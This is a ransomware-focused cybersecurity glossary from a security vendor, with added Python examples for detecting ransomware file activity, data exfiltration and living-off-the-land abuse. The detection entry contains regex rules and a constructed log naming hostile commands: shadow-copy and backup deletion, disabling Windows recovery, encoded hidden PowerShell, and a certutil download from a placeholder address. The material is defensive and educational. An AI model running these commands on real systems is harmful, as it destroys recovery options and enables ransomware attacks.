Cybersecurity Glossary

Our comprehensive guide to the complex terminology of the digital security realm. As the landscape of cybersecurity continues to evolve at a rapid pace, we believe in empowering our users with a clear understanding of the terms and concepts that shape this field. This glossary serves as an essential resource, providing succinct and easily-digestible explanations for both foundational and advanced cybersecurity jargon.


A

Air Gapping

Air gapping is a security measure that physically isolates a device or system from every other network, including the public Internet and the organization's own local area network: none of the device's network interfaces connects to another network, so data moves on or off it only by removable media or by a person. A "logical" air gap built from network segmentation, firewall rules, or storage that is normally unreachable can reduce exposure, but it remains reachable by software and does not provide the same assurance as physical isolation. In ransomware defense the term most often comes up in the context of backups: a copy that attackers cannot reach over the network is a copy they cannot encrypt or delete.

Anti-Ransomware

Anti-ransomware is software designed specifically to prevent, detect, and respond to ransomware attacks on computer systems and networks. Most endpoint protection models are trained on characteristics that malware in general shares, with some ransomware samples in the mix. Ransomware does not behave like most other malware, so training detection models on the few characteristics it shares with other malware leaves a lot of room for missed detections. Anti-ransomware detection models are instead trained on the behaviors that ransomware families share (for example, rapid rewriting and renaming of many files, deletion of backups and shadow copies, and dropping of ransom notes) to deliver more efficient and effective detection of ransomware attacks.
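The behaviors described above can be scored directly from file-system telemetry. The following Python is an added example, not Halcyon's detection model or code, that flags a process when it rewrites many files with ciphertext-like (high-entropy) content and also either renames their extensions in bulk or drops a ransom-note-like file. The file events, thresholds, and process names are constructed for illustration and are not vendor values.

```python
import math
from collections import defaultdict

# Illustrative thresholds (assumptions for this example, not vendor values).
ENTROPY_THRESHOLD = 7.5   # bits per byte; ciphertext is ~8.0, English text ~4-5
MIN_FILES = 5             # bulk rewrite: how many files one process must hit

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte. Encrypted or compressed data scores near 8.0."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)

def extension(path: str) -> str:
    name = path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def looks_like_ransom_note(path: str) -> bool:
    """Ransom notes are small text files with names meant to be read first."""
    name = path.rsplit("/", 1)[-1].lower()
    return name.endswith((".txt", ".html", ".hta")) and any(
        w in name for w in ("readme", "restore", "recover", "decrypt", "how_to"))

def score_processes(events):
    """Aggregate ransomware-specific signals per process and return a verdict.

    events: dicts with keys process, action ("write" | "rename"), path,
    and either data (bytes written) or new_path (rename target).
    """
    stats = defaultdict(lambda: {"files": set(), "high_entropy": 0,
                                 "ext_changes": 0, "ransom_notes": 0})
    for ev in events:
        s = stats[ev["process"]]
        s["files"].add(ev["path"])
        if ev["action"] == "write":
            if shannon_entropy(ev["data"]) >= ENTROPY_THRESHOLD:
                s["high_entropy"] += 1
            if looks_like_ransom_note(ev["path"]):
                s["ransom_notes"] += 1
        elif ev["action"] == "rename":
            if extension(ev["path"]) != extension(ev["new_path"]):
                s["ext_changes"] += 1

    report = {}
    for proc, s in stats.items():
        # Entropy alone is not enough: zip, docx, jpg and media files are
        # legitimately high-entropy. Require a second ransomware-specific
        # signal (bulk extension change or a ransom note) before flagging.
        verdict = (s["high_entropy"] >= MIN_FILES
                   and (s["ext_changes"] >= MIN_FILES or s["ransom_notes"] > 0))
        report[proc] = {"files": len(s["files"]), "high_entropy": s["high_entropy"],
                        "ext_changes": s["ext_changes"],
                        "ransom_notes": s["ransom_notes"], "verdict": verdict}
    return report

# Constructed sample data (not real telemetry).
CIPHERTEXT = bytes((i * 97 + 13) % 256 for i in range(1024))  # every byte value 4 times: entropy 8.0
PLAINTEXT = b"Quarterly report: revenue up four percent, see attached tables.\n" * 16

def sample_events():
    events = []
    for i in range(3):   # a word processor saving ordinary text
        events.append({"process": "winword.exe", "action": "write",
                       "path": f"/docs/notes{i}.txt", "data": PLAINTEXT})
    for i in range(8):   # an unknown binary rewriting files with ciphertext, then renaming them
        path = f"/docs/sheet{i}.xlsx"
        events.append({"process": "unknown_payload.exe", "action": "write",
                       "path": path, "data": CIPHERTEXT})
        events.append({"process": "unknown_payload.exe", "action": "rename",
                       "path": path, "new_path": path + ".locked"})
    events.append({"process": "unknown_payload.exe", "action": "write",
                   "path": "/docs/README_RESTORE_FILES.txt",
                   "data": b"Your files have been encrypted. Contact us to buy the key.\n"})
    return events

if __name__ == "__main__":
    for proc, r in score_processes(sample_events()).items():
        print(f"{proc:22s} {r}")
```

The entropy check is deliberately paired with a second signal: a backup agent or an archiver also writes high-entropy data to many files, but it does not change their extensions in bulk or leave a note telling the owner how to buy a key. A production detector would also weigh the rate of these events and whether the process is signed and known, which this example omits.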

Antivirus (AV)

Antivirus (AV) is a legacy software tool designed to detect and prevent known commodity malware from executing on a device or network, primarily by matching files against signatures of samples that have already been analyzed. Signature-based AV offers little protection against novel, polymorphic, repacked, or otherwise altered forms of malware until a new signature has been written and distributed. It requires human analysis and signature development, frequent updates, and lengthy scans that consume resources and impact productivity while offering only a modicum of protection. AV is adequate for personal computing, but it does not offer the level of protection organizations require against advanced threats.

Archiveus Trojan

Archiveus Trojan (2006) was one of the earliest ransomware families. It encrypted files on a victim's computer and demanded payment in exchange for the decryption key, establishing the pattern that crypto ransomware follows today.

Artificial Intelligence (AI) in Security

Artificial intelligence (AI) is a broad branch of computer science concerned with software that allows computer systems to perform tasks that imitate human cognitive abilities. In security, AI refers to the use of advanced machine learning (ML) models to automate and enhance the detection of, prevention of, and response to cyberattacks, including ransomware.

B

Big-game Hunting

Big-game hunting refers to cyberattacks customized to compromise high-value targets and large organizations, as opposed to spraying commodity malware indiscriminately. Ransomware operators favor it because a single large victim can pay a far larger ransom than many small ones.

Bitcoin

Bitcoin is a decentralized digital currency that is often demanded as payment in ransomware attacks. It is pseudonymous rather than anonymous: wallet addresses are not tied to identities, but every transaction is recorded on a public ledger, so payments can be traced and have in some cases been recovered by law enforcement. Attackers therefore tend to launder proceeds through mixing services or exchange them for other currencies.

Botnet

Short for "robot network," a botnet is a network of compromised computers or devices under the control of an attacker. Each compromised system becomes a "bot" that takes commands from a "bot-herder" or "bot-master" through command-and-control infrastructure. Botnets are used for spam, credential theft, denial-of-service attacks, and to deliver other malware, including ransomware loaders.

C

Crypto Ransomware

Crypto ransomware is the category of ransomware that encrypts a victim's files and demands payment in exchange for the decryption key. It is distinguished from locker ransomware, which blocks access to the device or its user interface without encrypting the underlying data. Nearly all modern ransomware is crypto ransomware.

Cryptocurrency

A digital or virtual currency that uses cryptography to secure transactions and operates independently of a central bank. Cryptocurrencies are the standard form of payment demanded in ransomware attacks because they can be transferred across borders without a bank's involvement and offer a degree of pseudonymity, though many, including Bitcoin, record every transaction on a public ledger and can be traced.

Cyber Insurance

Cyber insurance is a type of insurance policy that transfers part of the financial risk of a cyberattack from a business or individual to an insurer. It is a good complement to a robust security program, but it is not a replacement for an active defense posture. Insurers typically require the insured to deploy and maintain specific security controls (for example, multi-factor authentication, endpoint protection, and tested offline backups) as a condition of coverage. Failure to adhere to these requirements may render the policy unenforceable and negate any claims.

D

Data Exfiltration

Data exfiltration is the unauthorized transfer of sensitive or confidential data from a computer or network to an external location or attacker-controlled server. Today's ransomware operations are multi-staged attacks in which the threat actors infiltrate as much of the targeted network as possible while exfiltrating sensitive data along the way. They then threaten to publish the stolen data to put more pressure on the victim to pay the ransom and receive the decryption key to restore their systems. In some cases, the attackers demand an additional payment for the stolen data on top of the initial ransom. Because exfiltration usually happens before encryption, unusual outbound data volume is one of the last opportunities to catch an attack before the payload runs.
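One way to surface the exfiltration stage from network telemetry, as an added example that is not Halcyon code: baseline each host's daily volume of outbound traffic to non-internal addresses, then flag a day whose egress is both large in absolute terms and far above that host's own baseline, noting any destination the host has never contacted before. The flow records, hostnames, addresses (drawn from the RFC 5737 documentation ranges), and thresholds are constructed for this example.

```python
import ipaddress
import statistics
from collections import defaultdict

# Illustrative thresholds (assumptions for this example).
Z_THRESHOLD = 3.0              # standard deviations above the host's own baseline
MIN_BYTES = 100 * 1024 * 1024  # ignore spikes below 100 MiB; small hosts are noisy

# Enumerate internal ranges explicitly. The stdlib's is_private also treats the
# RFC 5737 documentation ranges as non-global, which would hide our sample data.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def daily_egress(flows):
    """Sum outbound bytes per host per day and record external destinations.

    flows: tuples (day, src_host, dst_ip, bytes_out).
    """
    totals = defaultdict(lambda: defaultdict(int))
    dests = defaultdict(lambda: defaultdict(set))
    for day, host, dst, nbytes in flows:
        if is_external(dst):
            totals[host][day] += nbytes
            dests[host][day].add(dst)
    return totals, dests

def detect_exfil(flows, baseline_days, target_day, z_threshold=Z_THRESHOLD,
                 min_bytes=MIN_BYTES, allowlist=frozenset()):
    """Return alerts for hosts whose egress on target_day is anomalous."""
    totals, dests = daily_egress(flows)
    alerts = []
    for host in totals:
        baseline = [totals[host].get(d, 0) for d in baseline_days]
        today = totals[host].get(target_day, 0)
        if today < min_bytes:
            continue
        mean = statistics.fmean(baseline)
        sd = statistics.pstdev(baseline)
        # A perfectly flat baseline followed by a spike has infinite z; treat as anomalous.
        z = (today - mean) / sd if sd else (float("inf") if today > mean else 0.0)
        if z < z_threshold:
            continue
        seen_before = set().union(*(dests[host][d] for d in baseline_days))
        new_dsts = sorted(dests[host][target_day] - seen_before - set(allowlist))
        alerts.append({"host": host, "bytes_out": today, "baseline_mean": round(mean),
                       "z": round(z, 1), "new_destinations": new_dsts})
    return alerts

# Constructed sample flows (RFC 5737 documentation addresses, not real traffic).
BASELINE_DAYS = [f"2024-05-0{d}" for d in range(1, 8)]
TARGET_DAY = "2024-05-08"
MiB = 1024 * 1024

def sample_flows():
    flows = []
    steady = [48, 52, 50, 49, 51, 50, 47]  # MiB/day of ordinary SaaS sync traffic
    for day, mb in zip(BASELINE_DAYS, steady):
        flows.append((day, "fileserver01", "203.0.113.10", mb * MiB))
        flows.append((day, "ws-042", "203.0.113.10", 5 * MiB))
        flows.append((day, "ws-042", "10.0.0.5", 900 * MiB))   # internal, ignored
    # Target day: fileserver01 pushes ~3 GiB to a never-before-seen external host.
    flows.append((TARGET_DAY, "fileserver01", "203.0.113.10", 50 * MiB))
    flows.append((TARGET_DAY, "fileserver01", "198.51.100.77", 3 * 1024 * MiB))
    flows.append((TARGET_DAY, "ws-042", "203.0.113.10", 6 * MiB))
    return flows

if __name__ == "__main__":
    for alert in detect_exfil(sample_flows(), BASELINE_DAYS, TARGET_DAY):
        print(alert)
```

The allowlist parameter exists because legitimate bulk egress (off-site backup targets, cloud storage the organization actually uses) will otherwise dominate the alerts; a per-host baseline rather than a global one matters for the same reason, since a file server's normal day looks like an anomaly for a workstation.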

Decryption

Decryption is the process of converting encrypted data back into its original, readable form using the correct key. In a ransomware attack, the threat actors offer to provide a decryption key, or a decryptor tool, in exchange for payment. Decrypting in this manner is a manual process that must be carried out on every impacted device, and the decryptors provided by attackers are often slow, fail outright, or return corrupted data. Organizations that maintain isolated, tested backups can restore their data without depending on the attacker at all.

Double Extortion

Double extortion is a ransomware tactic where cybercriminals not only encrypt the victim's data but also steal it beforehand and threaten to publish it unless a ransom is paid, so that restoring from backup alone does not end the incident. Additional layers of pressure, sometimes referred to as triple or quadruple extortion, include threatening denial-of-service (DoS) attacks, contacting or threatening the victim's customers and partners, short-selling the company's stock, and other tortious interference with the business.

E

Encryption

Encryption is the process of transforming data so that it can only be read by someone holding the corresponding key, protecting it from unauthorized access or modification in transit or at rest. In the final stage of a ransomware attack, the threat actors deploy the ransomware payload and encrypt the target's data, files, and systems, rendering them inaccessible. They then offer a decryption key in exchange for a ransom payment ranging from hundreds to tens of millions of dollars.

Encryption Key

An encryption key is the secret value a cipher uses to encrypt and decrypt data. It is distinct from a password: a key is a fixed-length string of bits, while a password is something a human remembers, from which a key can be derived. Legitimately, keys protect data from unauthorized access or theft; ransomware abuses the same primitive against the victim. Modern ransomware typically encrypts each file with a symmetric key and then protects those keys with a public key belonging to the attacker, so the private key that only the attacker holds is what the ransom payment buys. Without it, well-implemented ransomware encryption cannot be reversed, which is why recovery planning centers on backups rather than on breaking the encryption.

Endpoint Detection and Response (EDR)

Endpoint Detection and Response (EDR) is a security solution that allows security teams to monitor, detect, and investigate suspicious activity on hosts and endpoints. It employs automation that allows security teams to quickly identify and respond to threats. EDR is a powerful tool for protecting endpoints but has limitations when it comes to preventing the abuse of legitimate user credentials, protecting the wider network and cloud workloads, and leveraging telemetry from sources other than the endpoint.

Endpoint Protection (EPP)

Endpoint Protection (EPP) is a security solution deployed on individual devices, such as laptops, servers, and mobile devices, to prevent threats such as ransomware from executing. EPP typically bundles prevention engines such as antivirus or next-generation antivirus, device control, and a host firewall, whereas EDR focuses on detecting and investigating activity that got past prevention.

Extended Detection and Response (XDR)

Extended Detection and Response (XDR) is a comprehensive security solution that extends EDR by correlating telemetry from multiple sources beyond endpoints (network, cloud, identity, etc.) to detect, investigate, and respond to advanced threats such as multi-stage ransomware attacks. XDR holds much promise, but it is still in its infancy and has years of development ahead before it can deliver on its promised potential.

I

Immutability

Immutability refers to the integrity of an organization's critical data, especially backup data, and the assurance that it cannot be altered or deleted, by anyone, for a defined retention period. It is typically enforced by write-once-read-many (WORM) storage or object-lock features rather than by access control alone, because ransomware operators routinely obtain administrative credentials and use them to delete or encrypt backups before detonating the payload. A backup that an administrator account can delete is not immutable.
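As an added example of what "cannot be deleted by anyone" looks like in practice (not Halcyon configuration), this is the object-lock configuration document accepted by the AWS S3 PutObjectLockConfiguration API, for instance via `aws s3api put-object-lock-configuration --bucket <bucket> --object-lock-configuration file://lock.json`. The bucket name is a placeholder; the 30-day retention is an assumption to be set from the organization's recovery requirements.

```json
{
  "ObjectLockEnabled": "Enabled",
  "Rule": {
    "DefaultRetention": {
      "Mode": "COMPLIANCE",
      "Days": 30
    }
  }
}
```

The mode is the part that matters for ransomware. With `"Mode": "GOVERNANCE"`, a principal holding the `s3:BypassGovernanceRetention` permission can still delete object versions before the retention period ends, which is exactly the kind of permission an attacker with stolen administrator credentials will have. `COMPLIANCE` mode cannot be shortened or removed by any user, including the account root, until the retention period expires. Object Lock also requires bucket versioning, so a check that a backup target is genuinely immutable should confirm all three: versioning on, Object Lock enabled, and a default retention in compliance mode long enough to outlast the time an intrusion typically goes undetected.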

Incident Response

Incident response (IR) is the set of immediate actions that an organization takes in response to a cyberattack or data breach. A tested IR plan, or playbook, can help address incidents efficiently and contain them before they spread.

L

Living-off-the-Land (LotL)

Living-off-the-land is a technique used by attackers to evade detection by abusing legitimate tools, binaries, and scripting engines already present on a targeted system, such as PowerShell, WMI, scheduled tasks, remote administration tools, and built-in backup and boot configuration utilities, rather than dropping custom malware that security tools could fingerprint. In ransomware intrusions this commonly includes using built-in utilities to delete volume shadow copies and disable recovery options before encryption, so detection must focus on how these tools are used (command lines, parent processes, and sequence) rather than on their mere presence.
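Because the binaries are legitimate, detection has to key on the command line and the process lineage rather than on the file itself. The following Python is an added example, not Halcyon code, that runs a handful of well-documented ransomware-precursor patterns (shadow copy deletion, disabling Windows recovery, certutil downloads, encoded PowerShell, and Office applications spawning shells) over process-creation log lines. The log format, hostnames, users, and URL are constructed for this example; the command patterns themselves are the standard ones catalogued under MITRE ATT&CK T1490, T1105, and T1059.001.

```python
import re

# (rule name, regex over the command line). Matching is case-insensitive.
CMDLINE_RULES = [
    ("T1490 shadow copies deleted (vssadmin)", r"\bvssadmin(\.exe)?\s+delete\s+shadows"),
    ("T1490 shadow copies deleted (wmic)",     r"\bwmic(\.exe)?\s+shadowcopy\s+delete"),
    ("T1490 backup catalog deleted (wbadmin)", r"\bwbadmin(\.exe)?\s+delete\s+catalog"),
    ("T1490 recovery disabled (bcdedit)",      r"\bbcdedit(\.exe)?\b.*recoveryenabled\s+no\b"),
    ("T1105 download via certutil",            r"\bcertutil(\.exe)?\b.*-urlcache"),
    # PowerShell accepts -e, -enc and -encodedcommand; require a base64-looking argument.
    ("T1059.001 encoded PowerShell",
     r"\bpowershell(\.exe)?\b.*\s-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}"),
]
COMPILED = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in CMDLINE_RULES]

# Lineage rule: document-handling applications have no business launching shells.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line: str) -> dict:
    """Parse key=value fields; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}

def detect(lines):
    """Return one finding per (event, rule) match."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        image = ev.get("image", "").lower()
        parent = ev.get("parent", "").lower()
        cmdline = ev.get("cmdline", "")
        for name, rx in COMPILED:
            if rx.search(cmdline):
                findings.append({"host": ev.get("host"), "user": ev.get("user"),
                                 "image": image, "rule": name, "cmdline": cmdline})
        if parent in OFFICE_APPS and image in SHELLS:
            findings.append({"host": ev.get("host"), "user": ev.get("user"),
                             "image": image, "rule": "Office application spawned a shell",
                             "cmdline": cmdline})
    return findings

# Constructed process-creation events (not real logs; the base64 decodes to filler).
SAMPLE_LOG = r'''
ts=2024-05-01T09:58:10Z host=WS01 user=CORP\jdoe parent=explorer.exe image=certutil.exe cmdline="certutil.exe -hashfile C:\Users\jdoe\Downloads\setup.msi SHA256"
ts=2024-05-01T09:59:02Z host=WS01 user=CORP\jdoe parent=cmd.exe image=vssadmin.exe cmdline="vssadmin.exe list shadows"
ts=2024-05-01T10:03:44Z host=FS01 user=CORP\jdoe parent=cmd.exe image=vssadmin.exe cmdline="vssadmin.exe delete shadows /all /quiet"
ts=2024-05-01T10:03:45Z host=FS01 user=CORP\jdoe parent=cmd.exe image=wmic.exe cmdline="wmic shadowcopy delete"
ts=2024-05-01T10:03:47Z host=FS01 user=CORP\jdoe parent=cmd.exe image=bcdedit.exe cmdline="bcdedit /set {default} recoveryenabled no"
ts=2024-05-01T10:11:30Z host=WS07 user=CORP\mlee parent=winword.exe image=powershell.exe cmdline="powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAA=="
ts=2024-05-01T10:11:35Z host=WS07 user=CORP\mlee parent=powershell.exe image=certutil.exe cmdline="certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"
'''.strip().splitlines()

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f['host']} {f['user']} {f['image']}: {f['rule']}")
```

Note what the benign lines show: the same vssadmin.exe and certutil.exe binaries appear on WS01 with legitimate arguments and produce no findings, while three distinct recovery-inhibition commands on FS01 within a few seconds is the sequence that typically precedes encryption and deserves an immediate response, not a ticket.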

Locker Ransomware

Locker ransomware is an earlier type of ransomware that locks the victim out of their device or its user interface, typically with a full-screen ransom message, without encrypting the underlying files. Because the data itself is untouched, locker infections can often be removed with standard tools and the files recovered, which is why attackers moved to crypto ransomware, where the files are unreadable until a key is obtained.

M

Machine Learning

Machine learning (ML) is a branch of artificial intelligence (AI) in which algorithms learn patterns from data, rather than following hand-written rules, in order to classify new inputs or predict outcomes.

Machine Learning (ML) in Security

Machine learning in security refers to the use of algorithms and statistical models to analyze and identify patterns in data to detect and prevent cyberattacks, including ransomware.

Malware

Malware is malicious software, code, or scripts designed to harm, exploit, or take control of computer systems. Ransomware is a type of malware that encrypts files and demands payment for the decryption key.

Managed Detection and Response (MDR)

Managed Detection and Response (MDR) is a service that offers third-party threat detection and response that are otherwise undertaken in-house. MDR offers enhanced protection to organizations that either do not have the personnel or resources to support security operations or find managed services for some aspects of security operations to be financially optimal.

Managed Security Service Provider (MSSP)

A Managed Security Service Provider (MSSP) is a third-party company that provides cybersecurity services to organizations, including monitoring, threat detection, incident response, and remediation.

N

Next Generation Antivirus (NGAV)

Next Generation Antivirus (NGAV) is endpoint security software that uses techniques such as machine learning and behavioral analysis to detect and prevent malware, including ransomware, without relying solely on signatures of previously seen samples, so it can stop variants that traditional antivirus has never encountered.

P

Phishing

Phishing is a type of social engineering attack where a threat actor sends fraudulent emails or messages that impersonate a trusted party to trick individuals into revealing sensitive information such as credentials, or into opening a malicious link or attachment that installs malware. It is one of the most common initial-access vectors for ransomware.

Playbook/Runbook

A cybersecurity playbook defines the roles and responsibilities of members of an organization in response to a cybersecurity incident. It identifies the communications team and a contact liaison between the board and the rest of the organization. Playbooks also establish formal processes and procedures to ensure that required steps are systematically followed during the response and investigation, which helps organizations meet obligations under frameworks and regulations such as the NIST Cybersecurity Framework or GDPR. Playbooks cover administrative procedures, such as breach notification, as well as technical processes such as malware reverse engineering. A runbook is the more granular, step-by-step companion to a playbook for a specific task.

R

Ransomware

Ransomware is a type of malware that encrypts a victim's data, files, and systems and holds them hostage until a ransom is paid, at which point the attackers promise to provide a decryption key to restore access.

Ransomware Attack

A ransomware attack uses malicious code to encrypt a victim's data, files, and systems and withholds the decryption key until a ransom payment is received. Modern attacks are multi-stage intrusions: initial access, privilege escalation, lateral movement, data exfiltration, and destruction of backups typically precede the encryption itself.

Ransomware Campaign

A ransomware campaign is a coordinated attack operation designed to compromise and infect multiple targets with ransomware, encrypting their data, files, and systems until each victim pays for a decryption key.

Ransomware Gang

References to ransomware gangs generally refer to Ransomware-as-a-Service (RaaS) operators who provide the software platform and backend to launch attacks. They have development teams constantly improving their feature sets, they assist in negotiations during a successful attack, they manage customer service agents, market to new affiliates, and more, all for a slice of the profits. Ransomware variants and ransomware gangs often share the same name, but that is not always the case.

Ransomware Prevention

Ransomware prevention is the set of proactive measures taken to stop ransomware attacks before they succeed, such as deploying endpoint security software, enforcing multi-factor authentication and least privilege, patching exposed systems promptly, training employees to recognize phishing, and regularly backing up important data to a location the attackers cannot reach.

Ransomware Protection

Businesses of all sizes are vulnerable to cyberattacks like ransomware. To protect against this growing risk, business owners can invest in endpoint protection solutions and educate themselves about how to prevent, mitigate, and be resilient against the potential impact of a ransomware attack on operations.

Ransomware Recovery

Ransomware recovery is the incident response, investigation, and remediation procedures that address a ransomware attack and its potential impact on a victim organization.

Ransomware Rollback

Ransomware rollback is the process of restoring data and systems to their unencrypted state from before the attack, typically from snapshots, shadow copies, or backups. Because attackers know this, they routinely delete volume shadow copies and any backups they can reach before deploying the payload, so rollback is only reliable when the recovery points are stored where the attacker could not alter them.

Ransomware-as-a-Service (RaaS)

Ransomware-as-a-Service (RaaS) operators provide the attack platform and other mechanisms to carry out ransomware attack campaigns. They have development teams constantly improving their feature sets, they assist in negotiations during a successful attack, they manage customer service agents, market to new affiliates, and more, for a portion of the ransom proceeds.

Resilience

Resilience is the ability of an organization, tool, or environment to adapt to changing conditions and prepare for, withstand, and recover quickly from disruption.

Resilience in Security

The ability of a system or organization to withstand and recover from cyberattacks, including ransomware, through proactive measures such as backups, incident response plans, and employee training.

S

Service Level Agreement (SLA)

A Service Level Agreement (SLA) is a document that defines the level of service expected from a vendor. It lists the specific metrics to measure the services rendered and compensatory actions if those service levels are not achieved. An SLA is a critical component of any technology vendor contract.

SOC/SOCaaS

A Security Operations Center (SOC) is an organization's central command post that monitors and analyzes data from across all of its networks, devices, and databases. The goal is to improve the overall security posture while preventing, detecting, analyzing, and responding to cybersecurity incidents. Some organizations outsource their SOC functions and infrastructure to a third-party technology vendor such as an MSP or MSSP, a model referred to as SOC-as-a-Service (SOCaaS).

Scareware

Scareware is a type of malicious software that tricks users into believing their computer is infected with a virus or other malware, and then prompts them to purchase fake antivirus software or pay to remove a threat that does not exist.

Social Engineering

Social engineering attacks are among the most common ways ransomware operators gain initial access to a targeted network. Phishing via malicious emails or messages on social platforms is a favorite tactic. Specially crafted emails are designed to trick targets into clicking malicious links, opening tainted attachments, or providing sensitive information like user credentials. Attackers who have already infiltrated a network may also use social engineering to compromise identities with more privileges at the targeted organization, such as network administrators and company executives.

T

Tabletop Exercise

A tabletop exercise is a discussion-based simulation in which an organization's stakeholders walk through a cyberattack scenario, such as a ransomware outbreak, to test their response, identify weaknesses, and improve the incident response plan without touching production systems.

Threat Hunting

Threat hunting is the proactive, hypothesis-driven search for adversaries and active attacks that have evaded automated detection, before they can cause harm to a system or network.

Time-to-Ransom

Time-to-ransom is the elapsed time from an attacker's initial access to a network until the ransomware payload encrypts the victim's data and a ransom is demanded. Shorter times leave defenders less opportunity to detect and disrupt the intrusion before encryption.

Triple Extortion

Triple extortion is a technique where cybercriminals not only encrypt the victim's data but also apply multiple extortion methods to compel a ransom payment, like threatening to attack a victim's customers or partners or commencing a denial of service attack (DoS) in addition to the threat of leaking compromised data if a ransom payment is not received. See "Double Extortion" for more details.

Z

Zero-Day

A zero-day vulnerability is a security flaw in software or hardware that is unknown to the party responsible for fixing it, so no patch exists at the time it is exploited. Patching cannot defend against a zero-day; detecting the post-exploitation behavior that follows can.

The Halcyon Platform

Halcyon is the industry’s first dedicated, adaptive security platform focused specifically on stopping ransomware attacks. Halcyon is built by attackers to stop attackers. The solution is a lightweight agent that combines multiple proprietary advanced prevention engines along with AI models trained solely on ransomware.
